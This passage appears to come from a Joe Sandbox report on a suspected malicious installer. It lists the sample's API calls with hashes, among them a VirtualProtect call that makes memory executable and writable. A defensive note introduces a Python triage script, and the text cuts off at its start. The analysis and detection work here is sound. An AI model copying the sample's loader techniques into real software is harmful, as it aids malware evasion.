                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteValue
                                                          • String ID:
                                                          • API String ID: 2831762973-0
                                                          • Opcode ID: 263822df44c0b265f16a0eeb88216eb0e8276d8e6a5932a421656751ee5808a7
                                                          • Instruction ID: 8c17455a9467dbb84b7eb3278e4b377a62f271589af7dc4cff81b1a675067d18
                                                          • Opcode Fuzzy Hash: 263822df44c0b265f16a0eeb88216eb0e8276d8e6a5932a421656751ee5808a7
                                                          • Instruction Fuzzy Hash: 6CF06832A045219BDB10BBA5DA8E5AE62A5AB44354F11443FE502B71C1CAF84D02977D
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 004056DF
                                                            • Part of subcall function 00404542: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 0040572B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: InitializeMessageSendUninitialize
                                                          • String ID:
                                                          • API String ID: 2896919175-0
                                                          • Opcode ID: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
                                                          • Instruction ID: 52f38fc7938b2997ebb4afee836ba7d943988f66c47461a03c1f49ca59b4ab2d
                                                          • Opcode Fuzzy Hash: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
                                                          • Instruction Fuzzy Hash: 2AF02E72400610DBE7016B94AD02BA373A8FBC53A5F05503EFF89B32E0CB3658018B5D
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405B0D
                                                          • GetLastError.KERNEL32 ref: 00405B1B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                          • Instruction ID: 83f907d2df1d2810bbbe2cf052e9f9ea9028798b61a5f10ffece60f544324ce8
                                                          • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                          • Instruction Fuzzy Hash: 44F0F4B0D1060EDBDB00DFA4D6497EFBBB4AB04309F00812AD941B6281D7B89248CBA9
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: 220038190f5765e08acb68cab3f819293a66988b7b4b21bab0f24e91f41eee4f
                                                          • Instruction ID: 14a8ef39102396d835bb54982d99b4aace68b6eedf0c4e81be07541ee7d8ceed
                                                          • Opcode Fuzzy Hash: 220038190f5765e08acb68cab3f819293a66988b7b4b21bab0f24e91f41eee4f
                                                          • Instruction Fuzzy Hash: FEE04F76908610DFE748EBA4AE499EEB3F4EF80365B20197FE001F11D1DBB94D00966D
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                          • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3712363035-0
                                                          • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                          • Instruction ID: 1d4bd4e17b1592c090cadeee614c80d4297d43de2f88d62204b9ca700bb873e4
                                                          • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                          • Instruction Fuzzy Hash: C9E09AB4600219BFFB109B64AD06F7B767CE704604F408475BD15E6151D774A8158A78
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
                                                          • Instruction ID: 71f073bf0609ebb53fb67f9a0a806094daae3e6e017a449e2b81a31607f58fde
                                                          • Opcode Fuzzy Hash: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
                                                          • Instruction Fuzzy Hash: AFE04F32B10514ABCB18CFA8FED08AE73A6EB44321310053FD502B36A4C675AD409B18
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403662,0000000C,?,?,?,?,?,?,?,?), ref: 0040697D
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406998
                                                            • Part of subcall function 004068FB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406912
                                                            • Part of subcall function 004068FB: wsprintfW.USER32 ref: 0040694D
                                                            • Part of subcall function 004068FB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406961
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                          • Instruction ID: f16a4ad3e9102b165210d3f50f6adbe363033f5fe81171ed8a06a41b6d2757eb
                                                          • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                          • Instruction Fuzzy Hash: F1E08673504311AAD6105B759D0492772E89F89750302443EF986F2140DB38EC32A6AE
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040606B
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                          • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                          • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                          • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403545,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405B2B
                                                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B39
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                          • Instruction ID: 2532c664264170c07cbc731aa09703a23e3881c092aaf3b019fc47175ec23a7b
                                                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                          • Instruction Fuzzy Hash: 98C04C70604906DAD7505F219F087177960AB50741F158439A6C7F40A0DA74A455D92D
                                                          APIs
                                                          • CreateFileA.KERNELBASE(00000000), ref: 6FC42C57
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
                                                           • Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: a187784c1da4ef079c53416b4b392d4c54fda07993d69d14cf429dd4dea015df
                                                          • Instruction ID: 93f43be41578cda5c141f8146d2bdd74878f3826116ca88e8f114323f9675895
                                                          • Opcode Fuzzy Hash: a187784c1da4ef079c53416b4b392d4c54fda07993d69d14cf429dd4dea015df
                                                          • Instruction Fuzzy Hash: E941A075500705DFDF24EF68D9A6BD97774FB46368F208C26EA05CA540EB38A49CCBA0
                                                          APIs
                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 004016BB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FileMove
                                                          • String ID:
                                                          • API String ID: 3562171763-0
                                                          • Opcode ID: 28dc5c50ebc12032345a7729cf35481b8c8bbd71f25d5d2fe63a1407a727cbb2
                                                          • Instruction ID: b5cd7fb0f8cac405fb011e9cf8ea0a60cc8dc6b6af2237c550085c2a5a912803
                                                          • Opcode Fuzzy Hash: 28dc5c50ebc12032345a7729cf35481b8c8bbd71f25d5d2fe63a1407a727cbb2
                                                          • Instruction Fuzzy Hash: 1DF0903160812293CB1077B55F0ED9F26A49F8137CB21063FB112B21E1D6BCC902926E
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4
                                                            • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: 0f8cdb930f0e9c051f1287ec62565a86da269e9ff4fc99f02ffc866b5b181b8c
                                                          • Instruction ID: c79ba5cb2d88364bafa4f5c49a43b48020d8ed27846d342f9c81a2b2dcc73f01
                                                          • Opcode Fuzzy Hash: 0f8cdb930f0e9c051f1287ec62565a86da269e9ff4fc99f02ffc866b5b181b8c
                                                          • Instruction Fuzzy Hash: 9BE06D71904104ABDB00ABA5AE498FE73B9EB80355B20443FF101B04D4C77858109A2D
                                                          APIs
                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 0040643B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                          • Instruction ID: 173efcb61436e01de2ec3b268cd8b302251cd5bc368a703a1804e99dfb897165
                                                          • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                          • Instruction Fuzzy Hash: 51E0BF72010109BFEF095F60DD4AD7B3A1DE708610B11852EF906D5051E6B5A9705675
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034BD,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040612D
Memory Dump Source
• Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
• Instruction ID: 5447fabf40714e60d37a3b8d529c829a5aab84dab7567664cea5a9789522ebfd
• Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
• Instruction Fuzzy Hash: DFE08C3221021ABBDF109E518C00EEB3B6CEB003A0F014432FD26E7050D630E86097A4
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403507,00000000,00000000,0040332B,000000FF,00000004,00000000,00000000,00000000), ref: 004060FE
Memory Dump Source
• Source File: 00000000.00000002.1943050466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1943037269.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943063335.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943076050.0000000000464000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
• Instruction ID: 2902185137110ca2ffdb2282e3c832ce644deeff7f1201e2b4f2572205eed693
• Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
• Instruction Fuzzy Hash: D0E08C3221021AABCF109E508C01EEB3BACFF043A0F014432FD12EB042D230E9229BA4
APIs
• VirtualProtect.KERNELBASE(6FC4505C,00000004,00000040,6FC4504C), ref: 6FC42A9D
Memory Dump Source
• Source File: 00000000.00000002.1977389511.000000006FC41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FC40000, based on PE: true
• Associated: 00000000.00000002.1977358248.000000006FC40000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1977514250.000000006FC44000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1977627868.000000006FC46000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6fc40000_QNuQ5e175D.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 3994841b8d82a1da1a8c53e604499ff48789200274fe639c38e549c72da0e5b1
• Instruction ID: 6761292f3389b468029a9cea52c357481170b30edbb95b8b1ec25a4db7626a03
• Opcode Fuzzy Hash: 3994841b8d82a1da1a8c53e604499ff48789200274fe639c38e549c72da0e5b1
• Instruction Fuzzy Hash: F8F0A5B8504A86DECB60EF2C84447093BF0B70B334B144D2AE348D6288E374406CCBA1
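The function listing in this report is long and uniform, so the useful signal (which API is called from which image, with which arguments) is easy to miss when scrolling. The VirtualProtect call above is a case in point: the third argument is 00000040 (PAGE_EXECUTE_READWRITE) and the call site sits in the separately dumped 6FC40000 image, not in the main 00400000 executable, while the lstrcatW subcall further down carries a "Skipped: ...\nsk3C2D.tmp\System.dll" status string. The following Python triage script is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses lines in the "APIs" format used on this page, flags page-protection changes that leave memory both writable and executable, groups call sites by image, and collects paths under an ns*.tmp directory from string arguments. The line grammar, the 64 KiB-aligned image heuristic (ref & 0xFFFF0000) and the ns*.tmp pattern are assumptions of the example, and the sample input is copied from the listing on this page.

```python
import re
from collections import defaultdict

# Constructed input: "APIs" lines copied verbatim from this report's function listing.
SAMPLE_LINES = r"""
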